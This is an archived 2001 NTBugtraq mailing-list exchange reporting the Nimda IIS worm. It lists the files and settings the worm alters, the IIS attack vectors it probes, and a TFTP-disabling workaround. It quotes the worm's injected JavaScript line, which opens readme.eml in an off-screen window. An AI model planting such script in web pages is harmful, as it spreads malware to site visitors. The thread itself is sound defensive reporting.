Re: Alert: Some sort of IIS worm seems to be propagating

From: Simon Clausen (sclausen@PROTOCOL.COM.AU)
Date: 09/18/01


Message-ID:  <001e01c14083$5a7b5490$cb958490@protocol.com.au>
Date:         Wed, 19 Sep 2001 06:49:04 +1000
From: Simon Clausen <sclausen@PROTOCOL.COM.AU>
Subject:      Re: Alert: Some sort of IIS worm seems to be propagating
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Sent on behalf of Rich Zuris (rzuris@magnetpoint.com) due to his network
being taken offline by the worm.

Following is a list of recorded changes made to NT4 SP6a with Q299444
rollup security patches.

The following is appended to EVERY HTML file on the machine:
<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>

Just about every directory on the machine has one or more files with
extension .eml, mostly readme.eml but also other names that seem to
correspond to directory or other filenames. Total of 1234 .eml files
created, totalling 98Mb (about 78Kb each). Also got 55 files with
extension .nws, containing exact same content. Both .eml and .nws files
can be opened by Outlook Express.

Virus makes numerous outbound connections to port 80 to propagate itself
to other servers.

Virus sets IE5 to IE4 compatibility mode (apparently to circumvent
security) and crashes Explorer.exe when IE is launched. IExplore.exe
appears to be hacked, and there is now a hidden IExplore .exe (note the
space before the extension) in same directory.

Virus code in stealth executable file with name tftp###, where ### is
any numeric string. File has no extension, but it is definitely a
Windows executable. This file is placed into \Program Files\Common
Files\System\MSADC, and in same directory, Admin.dll appears to be
hacked.

IIS console hacked: New MMC.EXE placed in \WINNT directory, which may
override original version in \WINNT\System32.

EXE files placed into TEMP directory. Note that most/all hacked EXE
files are flagged Hidden.

Riched20.dll files placed in random directories (not on PATH, not
containing executables).

NT Account "Guest" was made a member of the NT "Administrators" group!

Regards,

Simon Clausen

-----Original Message-----
From: Windows NTBugtraq Mailing List
[mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM] On Behalf Of Russ
Sent: Wednesday, 19 September 2001 1:21 AM
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Alert: Some sort of IIS worm seems to be propagating

-----BEGIN PGP SIGNED MESSAGE-----

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected" machines
are using a wide variety of attacks which attempt to exploit already
known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no text
in this message when it is displayed by Outlook when in Auto-Preview
mode (always a good indication there's something not quite right with an
email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous other
known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a file
called ADMIN.DLL from (presumably) some previously compromised box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL in
the /scripts directory), please forward me a copy of that .dll ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the
following;

edit %systemroot/system32/drivers/etc/services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows
File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----

========================================================================
====
Delivery co-sponsored by Trend Micro, Inc.
========================================================================
====
TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE

If you are worried about email viruses, you need Trend Micro ScanMail
for Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0.
ScanMail ensures 100% inbound and outbound email virus scanning and
provides remote software management. Download a FREE 30-day trial copy
of ScanMail and find out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
========================================================================
====

============================================================================
Delivery co-sponsored by Trend Micro, Inc.
============================================================================
TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE

If you are worried about email viruses, you need Trend Micro ScanMail for
Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail
ensures 100% inbound and outbound email virus scanning and provides remote
software management. Download a FREE 30-day trial copy of ScanMail and find
out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
============================================================================



Relevant Pages

  • Re: Alert: Some sort of IIS worm seems to be propagating
    ... Subject: Alert: Some sort of IIS worm seems to be propagating ... TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE ...
    (NT-Bugtraq)
  • RE: OWA Not working Page not Found
    ... you reset the Exchange OWA virtual directories on SBS: ... How to reset the default virtual directories that are required to provide ... Outlook Web Access, Exchange ActiveSync, and Outlook Mobile Access services ... your screen until you reach the Setup Type page of the IIS 6.0 Resource Kit ...
    (microsoft.public.windows.server.sbs)
  • Re: public folders snap-in is hanging mmc.exe
    ... there are the following Exchange related Virtual Directories ... Exadmin virtual root (the default Web site is "Default Web Site"). ... Restart IIS Admin Service. ...
    (microsoft.public.windows.server.sbs)
  • Re: SBS 2003 PDA Sync Problem - Error 0x85010014
    ... Export all mails in Mailbox as .PST file. ... Remove the Exchange Attribute for problematic user with corrupt Exchange ... Please verify Authentication settings by the following steps. ... Open IIS Manager ...
    (microsoft.public.backoffice.smallbiz)
  • RE: no OWA
    ... Once you do that and restart IIS you should see the ASP.NET tab and it had ... the Exchange related VDs in IIS. ... To restart the Microsoft Exchange System Attendant service, ... This newsgroup only focuses on SBS technical issues. ...
    (microsoft.public.windows.server.sbs)